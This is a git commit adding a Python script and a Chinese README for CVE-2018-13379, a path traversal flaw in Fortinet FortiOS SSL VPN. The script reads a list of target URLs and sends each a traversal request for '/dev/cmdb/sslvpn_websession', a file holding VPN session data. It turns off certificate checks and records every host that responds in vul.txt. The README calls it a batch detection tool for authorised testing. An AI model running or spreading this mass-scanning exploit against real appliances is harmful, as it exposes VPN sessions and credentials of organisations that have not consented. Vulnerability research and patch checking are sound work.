CVE-2018-13379
This commit is contained in:
B1anda0
BIN
CVE-2018-13379.png
Normal file
BIN
CVE-2018-13379.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 17 KiB |
51
CVE-2018-13379.py
Normal file
51
CVE-2018-13379.py
Normal file
@@ -0,0 +1,51 @@
|
||||
#!/usr/bin/env python
|
||||
# coding:utf-8
|
||||
# author:B1anda0
|
||||
#affect version FortiOS 5.6.3-5.6.7,6.0.0-6.0.4
|
||||
|
||||
import requests,sys,colorama
|
||||
from colorama import *
|
||||
init(autoreset=True)
|
||||
|
||||
|
||||
banner='''\033[1;33;40m
|
||||
_______ ________ ___ ___ __ ___ __ ____ ____ ______ ___
|
||||
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ |___ \___ \____ / _ \
|
||||
| | \ \ / /| |__ ______ ) | | | || | (_) |_____| | __) |__) | / / (_) |
|
||||
| | \ \/ / | __|______/ /| | | || |> _ <______| ||__ <|__ < / / \__, |
|
||||
| |____ \ / | |____ / /_| |_| || | (_) | | |___) |__) |/ / / /
|
||||
\_____| \/ |______| |____|\___/ |_|\___/ |_|____/____//_/ /_/
|
||||
'''
|
||||
|
||||
|
||||
def verify():
|
||||
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
|
||||
payload= '/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
|
||||
poc=urls+payload
|
||||
try:
|
||||
requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
|
||||
response=requests.get(poc,headers=headers,timeout=15,verify=False)
|
||||
if response.status_code==200 and "fgt_lang" in response.content:
|
||||
print(u'\033[1;31;40m[+]{} is fortios directory traversal vulnerability'.format(urls))
|
||||
#将漏洞地址输出在Vul.txt中
|
||||
f=open('./vul.txt','a')
|
||||
f.write(urls)
|
||||
f.write('\n')
|
||||
else:
|
||||
print('\033[1;32;40m[-]{} None'.format(urls))
|
||||
except:
|
||||
print('{} request timeout'.format(urls))
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
print (banner)
|
||||
if len(sys.argv)!=2:
|
||||
print('Example:python CVE-2018-13379.py urls.txt')
|
||||
else:
|
||||
file = open(sys.argv[1])
|
||||
for url in file.readlines():
|
||||
urls=url.strip()
|
||||
if urls[-1]=='/':
|
||||
urls=urls[:-1]
|
||||
verify()
|
||||
print ('Check Over')
|
||||
19
README.md
19
README.md
@@ -1,2 +1,17 @@
|
||||
# CVE-2018-13379
|
||||
Fortinet FortiOS路径遍历漏洞 (CVE-2018-13379)批量检测脚本
|
||||
## 使用方法&免责声明
|
||||
|
||||
该脚本为Fortinet FortiOS路径遍历漏洞 (CVE-2018-13379)批量检测脚本。
|
||||
|
||||
使用方法:`Python CVE-2018-13379.py url.txt`
|
||||
|
||||
漏洞地址输出在vul.txt中
|
||||
|
||||
##### 影响版本:
|
||||
|
||||
Fortinet FortiOS 5.6.3 - 5.6.7、6.0.0 - 6.0.4 版本中的SSL VPN 受此漏洞影响。
|
||||
|
||||
漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可以利用该漏洞访问受限目录以外的位置。
|
||||
|
||||
|
||||
|
||||
工具仅用于安全人员安全测试,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
|
||||
Reference in New Issue
Block a user